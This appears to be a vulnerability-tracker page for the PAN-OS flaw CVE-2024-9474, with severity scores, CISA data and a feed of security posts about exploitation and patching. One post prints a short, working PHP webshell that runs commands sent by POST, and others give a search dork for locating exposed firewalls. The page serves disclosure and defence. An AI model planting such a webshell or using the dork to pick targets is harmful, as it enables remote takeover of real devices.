CVE-2024-9474

Published Nov 18, 2024

Last updated 2 months ago

Overview

Description
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.
Source
psirt@paloaltonetworks.com
NVD status
Analyzed

Insights

Analysis from the Intruder Security Team
Published Nov 19, 2024

The vulnerabilities CVE-2024-0012 and CVE-2024-9474 can be combined to allow for an unauthenticated attacker to gain command line access to the vulnerable device. Compromising a vulnerable device would allow an attacker to gain access to internal networks as these devices are designed to sit on the edge of networks.

The vulnerability is due to a misconfigured Nginx instance and a command injection vulnerability, both of which are exploitable in the devices default state. Watchtowr have released a technical blog post detailing the vulnerability and its exploitation.

Palo Alto have released patches and hotfixes for the PAN-OS vulnerabilities, details are available here and here.

Risk scores

CVSS 4.0

Type
Secondary
Base score
6.9
Impact score
-
Exploitability score
-
Vector string
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Red
Severity
MEDIUM

CVSS 3.1

Type
Primary
Base score
7.2
Impact score
5.9
Exploitability score
1.2
Vector string
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Severity
HIGH

Known exploits

Data from CISA

Vulnerability name
Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Exploit added on
Nov 18, 2024
Exploit action due
Dec 9, 2024
Required action
Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, the management interfaces for affected devices should not be exposed to untrusted networks, including the internet.

Weaknesses

psirt@paloaltonetworks.com
CWE-78
nvd@nist.gov
CWE-78

Social media

Hype score is a measure of social media activity compared against trending CVEs from the past 12 months. Max score 100.

Hype score

1

  1. Palo Alto Networks warns that a file read vulnerability (CVE-2025-0111) is now being chained in attacks with two other flaws (CVE-2025-0108 with CVE-2024-9474) to breach PAN-OS firewalls in active attacks. https://t.co/kBTdJnAFpQ

    @blackwired32799

    20 Feb 2025

    25 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. 🚨🚨CVE-2025-0111: PAN-OS: Authenticated File Read Vulnerability in the Management Web Interface ⚠️Hackers are chaining it with CVE-2025-0108 & CVE-2024-9474 to breach firewalls! ZoomEye Dork👉app="Palo Alto Networks PAN-OS Firewall" 3.7k+ results are found on ZoomEye. SHODA

    @zoomeye_team

    20 Feb 2025

    389 Impressions

    0 Retweets

    2 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. 🚨🚨CVE-2025-0111: PAN-OS: Authenticated File Read Vulnerability in the Management Web Interface ⚠️Hackers are chaining it with CVE-2025-0108 & CVE-2024-9474 to breach firewalls! ZoomEye Dork👉app="Palo Alto Networks PAN-OS Firewall" 3.7k+ results are found on ZoomEye. Zoom

    @zoomeye_team

    20 Feb 2025

    24 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. Have you updated your PAN-OS firewall? A file read vulnerability (CVE-2025-0111) is being exploited in combination with two other vulnerabilities (CVE-2025-0108 and CVE-2024-9474) to gain root privileges on an unpatched PAN-OS firewall. https://t.co/6FBudk6COp

    @WRANCORP

    20 Feb 2025

    113 Impressions

    0 Retweets

    4 Likes

    0 Bookmarks

    0 Replies

    1 Quote

  5. Palo Alto Networks warns that a file read vulnerability (CVE-2025-0111) is now being chained in attacks with two other flaws (CVE-2025-0108 with CVE-2024-9474) to breach PAN-OS firewalls in active attacks. https://t.co/I1DIMQtMwb #rhymtech #thinkcyberthinkrhym #rhymcyberupdates

    @Rhym_Tech

    20 Feb 2025

    5 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. Palo Alto Networks warns that a new exploit chain is actively being used against unpatched PAN-OS firewalls. Attackers are chaining CVE-2025-0108, CVE-2024-9474, and CVE-2025-0111 to gain root access and steal sensitive data. Despite patches being available https://t.co/SUfubA5Ye

    @cyberbulletins

    20 Feb 2025

    57 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  7. Palo Alto Networks alerts of active exploits in PAN-OS firewalls affecting unpatched devices. CVE-2025-0111, CVE-2025-0108, and CVE-2024-9474 pose risks to sensitive data. #CISA #PaloAlto #USA link: https://t.co/BWFJjXMbtR https://t.co/fngIbmgBM5

    @TweetThreatNews

    19 Feb 2025

    108 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    5 Replies

    0 Quotes

  8. Palo Alto Networks has reported active exploitation of vulnerabilities in its PAN-OS software, specifically CVE-2024-9474 (6.9-rated) and CVE-2025-0108 (8.8-rated), which, when chained with CVE-2025-0111 (7. https://t.co/8s67C36hqT

    @securityRSS

    19 Feb 2025

    55 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  9. 🚨 [URGENT – HIGHEST PRIORITY] @PaloAltoNtwks Palo Alto Networks Confirms Active Exploits Chaining CVE-2025-0108, CVE-2024-9474 & CVE-2025-0111 PAN-OS Firewalls – IMMEDIATE ACTION REQUIRED! 🚨 Palo Alto Networks has updated its advisory, confirming that CVE-2025-0108 – an…

    @L8on_Hargrave

    19 Feb 2025

    80 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  10. #exploit 1. CVE-2024-0012/CVE-2024-9474: Auth Bypass in PAN-OS Web Interface https://t.co/SgNOxX5gde 2. CVE-2025-23369: GitHub Entreprise Server SAML auth bypass https://t.co/iCGbLYz9rt 3. CVE-2022-45460: ROPing our way to RCE https://t.co/GzC2JZCb2N

    @ksg93rd

    11 Feb 2025

    90 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  11. Actively exploited CVE : CVE-2024-9474

    @transilienceai

    6 Feb 2025

    10 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  12. Actively exploited CVE : CVE-2024-9474

    @transilienceai

    5 Feb 2025

    18 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  13. Actively exploited CVE : CVE-2024-9474

    @transilienceai

    5 Feb 2025

    9 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  14. ⚠️ CVE-2024-9474: Vulnerabilidad en Palo Alto Networks PAN-OS 🔒 🛑 Nivel de Urgencia: Alta 📉 Criticidad: Media Instituciones financieras que utilizan dispositivos de seguridad de Palo Alto Networks podrían estar en peligro si esta vulnerabilidad es explotada. https://t.co/H

    @BanCERT_gt

    16 Jan 2025

    28 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  15. CVE-2024-0012 (9.3) and CVE-2024-9474 (6.9) exploitation is in the wild. Post-explotaition Webshell example dropped. <?php $z="system"; if(${"_POST"}["b"]=="iUqPd") { $z(${"_POST"}["x"]); };

    @byt3n33dl3

    8 Jan 2025

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  16. ⚠️#ثغرات PAN-00-OS رقم CVE-2024-0012 و CVE-2024-9474! لا تزال هناك أجهزة #PaloAlto معرضة لتهديدات تصعيد الامتيازات والاستيلاء على النظام. تحقق من PoC لمهاجمة الأجهزة التي لم يتم إصلاحها وكيفية تحديد الإصدار المعرض للخطر باستخدام معلومات القائمة على #ASM! https://t.co/BVD5eerQhm h

    @CriminalIP_AR

    8 Jan 2025

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  17. ⚠️PAN-OS #脆弱性 CVE-2024-0012 & CVE-2024-9474にご注意! 権限奪取とシステム掌握の脅威にさらされている #パロアルト 機器がまだ公開されています。 パッチが適用されていない機器を攻撃するPoCと #ASM ベースの脅威インテリジェンスで脆弱なバージョンを確認する方法をご確認ください!… https://t.co/VeuIaiHB0u https://t.co/K8lNWWuvlW

    @CriminalIP_JP

    8 Jan 2025

    117 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  18. ⚠️PAN-OS #취약점 CVE-2024-0012 & CVE-2024-9474 주의! 여전히 권한 탈취와 시스템 장악 위협에 노출된 #팔로알토 장비들이 공개되어 있습니다. 패치되지않은 장비를 공격하는 PoC와 #ASM 기반 위협 인텔리전스로 취약한 버전을 확인하는 방법을 확인해보세요! https://t.co/oZDZfpoNfh https://t.co/z9jmhvAEYz https://t.co/A6yvp0hgod

    @CriminalIP_KR

    8 Jan 2025

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  19. Palo Alto の脆弱性 CVE-2024-9474 を悪用:LITTLELAMB.WOOLTEA バックドアを展開 https://t.co/khdpfQLYbo なんというか、バックドアのお手本のような LITTLELAMB.WOOLTEA ですね。すでに Palo Alto から、脆弱性 CVE-2024-9474… https://t.co/kT15lUwc4t

    @iototsecnews

    7 Jan 2025

    112 Impressions

    3 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. ''Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474) by sfewer-r7 · Pull Request #19663 · rapid7/metasploit-framework'' #infosec #pentest #redteam #blueteam https://t.co/3FCdNJYFEh

    @CyberWarship

    3 Jan 2025

    3568 Impressions

    12 Retweets

    47 Likes

    17 Bookmarks

    3 Replies

    1 Quote

  21. 🟥このバックドアは正規のlogdサービスを装っており、rc.localファイルを変更して、パッケージマネージャー「RedHat」の構成を変更することで永続性を実現 パロアルト製デバイスにバックドア「LITTLELAMB.WOOLTEA」を発見(CVE-2024-9474) https://t.co/K3qnn6cHZe

    @n_gsx1300r

    1 Jan 2025

    143 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  22. #Malware #Vulnerability CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices https://t.co/lKYDkWD6jl

    @Komodosec

    28 Dec 2024

    12 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  23. 🚨 Exploiting #CVE-2024-9474: A Sophisticated Backdoor Campaign https://t.co/2SS0IaVRHt

    @UndercodeNews

    26 Dec 2024

    30 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  24. 🚨🚨CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices ⚠Attackers exploited CVE-2024-9474, a vulnerability publicly disclosed just before the attack. Using this entry point, the threat actor deployed a malicious script named bwmupdate, which… htt

    @zoomeye_team

    26 Dec 2024

    724 Impressions

    4 Retweets

    8 Likes

    3 Bookmarks

    0 Replies

    0 Quotes

  25. Top 5 Trending CVEs: 1 - CVE-2024-53961 2 - CVE-2024-9474 3 - CVE-2024-30085 4 - CVE-2024-45387 5 - CVE-2024-12744 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    26 Dec 2024

    13 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  26. 🚨パロアルト製デバイスにバックドア「LITTLELAMB.WOOLTEA」を発見 攻撃者はPAN-OSの脆弱性CVE-2024-9474を悪用 〜サイバーアラート 12月26日〜 https://t.co/E01LAaqwU6 #セキュリティ #インテリジェンス #OSINT

    @MachinaRecord

    26 Dec 2024

    70 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  27. CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices https://t.co/BUmhL3SeMA

    @Dinosn

    25 Dec 2024

    13033 Impressions

    42 Retweets

    145 Likes

    47 Bookmarks

    1 Reply

    2 Quotes

  28. #threatreport #LowCompleteness LITTLELAMB.WOOLTEA: Stealthy Network Edge Device Backdoor | 24-12-2024 Source: https://t.co/yjBnqNpqMG Key details below ↓ 💀Threats: Littlelamb_wooltea, 🎯Victims: Palo alto network firewall 🌐Geo: Dutch 🔓CVEs: CVE-2024-9474… https://t.co/R8Nk

    @rst_cloud

    25 Dec 2024

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  29. パロアルトネットワークス社機器の脆弱性CVE-2024-9474が悪用され、LITTLELAMB.WOOLTEAバックドアが仕込まれている。Northwave Cyber Security社報告。LITTLELAMB.WOOLTEAはlogdサービスに偽装し、rc.localとパッケージマネージャーの構成変更により永続化。 https://t.co/albXTm9Dd2

    @__kokumoto

    25 Dec 2024

    1987 Impressions

    3 Retweets

    24 Likes

    6 Bookmarks

    1 Reply

    1 Quote

  30. CVE-2024-9474 Exploited: LITTLELAMB.WOOLTEA Backdoor Discovered in Palo Alto Devices Learn about the stealthy operation of LITTLELAMB.WOOLTEA, a backdoor targeting Palo Alto Networks firewalls. Explore its entry point and persistent qualities. https://t.co/4OWXDt1wGj

    @the_yellow_fall

    25 Dec 2024

    411 Impressions

    3 Retweets

    6 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  31. Palo Alto merilis pembaruan untuk 2 kerentanan zero-day. CVE-2024-0012 memungkinkan "bypass autentikasi" dan CVE-2024-9474 terkait "eskalasi hak akses". Terungkap lebih dari 11.000 antarmuka manajemen PAN-OS terpapar, termasuk #Indonesia https://t.co/6hk4EV8Cnd https://t.co/KrtH

    @TweetThreatNews

    24 Dec 2024

    53 Impressions

    0 Retweets

    1 Like

    1 Bookmark

    0 Replies

    0 Quotes

  32. https://t.co/I0KbHzipmc Security breaches in Palo Alto Networks firewall devices On November 18, 2024, Palo Alto Networks announced two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A …

    @B2bCyber

    19 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. GitHub - TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC: This PoC is targeting vulnerabilities in Palo Alto PAN-OS, specifically CVE-2024-0012 and CVE-2024-9474. This script automates the exploitation process, including payload creation, chunked delivery https://t.co/qwxjv3ZKT4

    @testalways

    14 Dec 2024

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  34. 🚨We’ve just released a PoC and write-up on exploiting CVE-2024-0012 and CVE-2024-9474 in Palo Alto PAN-OS, demonstrating how these vulnerabilities can be chained for unauthenticated RCE 🔗 PoC Link: https://t.co/OLdPOO1Slt 📖 Write-up: https://t.co/oMHKDyDBEm

    @fahadshah4111

    13 Dec 2024

    64 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  35. 2024年11月分 #MBSD #SOC の検知傾向トピックスを公開しました。 今月は、Palo Alto Networks社のPAN-OSにおける認証回避・特権昇格の脆弱性(CVE-2024-0012, CVE-2024-9474)を狙った攻撃を新たに観測しました。 詳しくはこちら▼ https://t.co/G7Nl0Guxww #mbsd #脆弱性 #SOC… https://t.co/GtcYZyfJc8 https://t.co/egfuyt9Eit

    @mbsdnews

    13 Dec 2024

    589 Impressions

    1 Retweet

    3 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  36. ➡️ In November 2024, @PaloAltoNtwks disclosed two critical #vulnerabilities in PAN-OS, their Next-Generation Firewall operating system: CVE-2024-0012 and CVE-2024-9474. ➡️ Threat actors are actively chaining these vulnerabilities to achieve unauthenticated remote code execution

    @sygnia_labs

    11 Dec 2024

    40 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  37. What's wrong with you @PaloAltoNtwks ? Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474. https://t.co/R82Ng1GZmg https://t.co/yIRVpTByvX

    @l0rdmalware

    8 Dec 2024

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. 🚨 Urgent Patch Needed: Palo Alto Networks PAN-#OS Vulnerability (#CVE-2024-9474) Grants Root Access https://t.co/676UqNqUJd

    @UndercodeNews

    8 Dec 2024

    29 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  39. [NEW VIDEO] @packetdefender explains how users can quickly find critical vulnerabilities like #paloaltonetworks CVE-2024-0012 and CVE-2024-9474; while also addressing #CISA BOD 23-02: Implementation Guidance for Mitigating the Risk from Internet-Exposed Management Interfaces http

    @forwardnetworks

    4 Dec 2024

    35 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  40. #threatreport #LowCompleteness Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22) | 02-12-2024 Source: https://t.co/Ufx2z1M2IZ Key details below ↓ 🧑‍💻Actors/Campaigns: Lunar_peek 🎯Victims: Palo alto networks 🌐Geo: Emea

    @rst_cloud

    3 Dec 2024

    107 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  41. A critical vulnerability (CVE-2024-9474) in PAN-OS exposes networks to unauthorized access and control, creating significant security risks. 🔗https://t.co/4RWZJYOJLi #itsecurity #cybersecurity

    @TrueFort

    2 Dec 2024

    10 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  42. Over 2,000 Palo Alto Networks devices compromised in a recent attack, exploiting CVE-2024-0012 & CVE-2024-9474. Stay vigilant and enhance security! Read more: https://t.co/qvngYfWNr0 #PaloAlto #CyberThreats #DataBreach https://t.co/Y4kwYLkeix

    @CyberPro_M

    2 Dec 2024

    73 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  43. 3/11 Exploited vulnerabilities: CVE-2024-0012 (Auth bypass) and CVE-2024-9474 (Priv. escalation). A dangerous combo for attackers. #FirewallVulnerabilities 🔐

    @Eth1calHackrZ

    2 Dec 2024

    76 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  44. 🚨 2,000+ Palo Alto firewalls compromised! 😱 CVE-2024-0012 lets attackers bypass auth, while CVE-2024-9474 escalates privileges. 📈 Time to tighten up access & patch your systems! 🛡️ #CyberSecurity #Infosec #NetworkSecurity https://t.co/7SEmEXHis9 https://t.co/UEpUJzoTiT

    @WTE_Solutions

    1 Dec 2024

    77 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  45. The Shadowserver Foundation reports that over 2,000 Palo Alto Networks firewalls have been hacked via two zero-day vulnerabilities: CVE-2024-0012 & CVE-2024-9474, enabling admin bypass and root access. Top targets: US & India. https://t.co/MEkAMzSr7y

    @darkwebinsight

    1 Dec 2024

    37 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    1 Quote

  46. CVE-2024-0012/CVE-2024-9474 : Found in Palo Alto Networks PAN-OS. Weak validation in Nginx configs & inputs allows for auth bypass, leading to admin privilege escalation. https://t.co/tAyhI4npuV

    @hackyboiz

    30 Nov 2024

    2707 Impressions

    18 Retweets

    47 Likes

    14 Bookmarks

    0 Replies

    0 Quotes

  47. Elevation of Privilege - PAN-OS (CVE-2024-9474). The need for authentication and admin access could limit this vulnerability's impact, but here we have the previous vulnerability Authentication Bypass - PAN-OS (CVE-2024-0012). 😏 #PaloAlto ➡️ https://t.co/17vlgiQy75 https://t.co

    @leonov_av

    29 Nov 2024

    69 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  48. 🚨 Threat Campaign Targets Palo Alto Networks Firewall Devices #CyberThreat #Vulnerabilities 🔑 Key Details: - 🎯 Threat actors exploit Palo Alto Networks PAN-OS vulnerabilities (CVE-2024-0012 & CVE-2024-9474) for remote code execution and privilege escalation. - 🔍 Attacker

    @ctilabs

    29 Nov 2024

    63 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  49. Is your PAN-OS updated? Two critical vulnerabilities, CVE-2024-0012 & CVE-2024-9474, can expose your network to serious threats. Don't wait! Secure your devices now with the latest patches. Protect your data and peace of mind. #CyberSecurity https://t.co/lDToZtOHwb

    @sequretek_sqtk

    29 Nov 2024

    34 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  50. 🟠 Palo Alto Networks PAN-#OS, Privilege Escalation, #CVE-2024-9474 (MEDIUM) - Medium https://t.co/xo9onikWaq

    @dailycve

    28 Nov 2024

    34 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations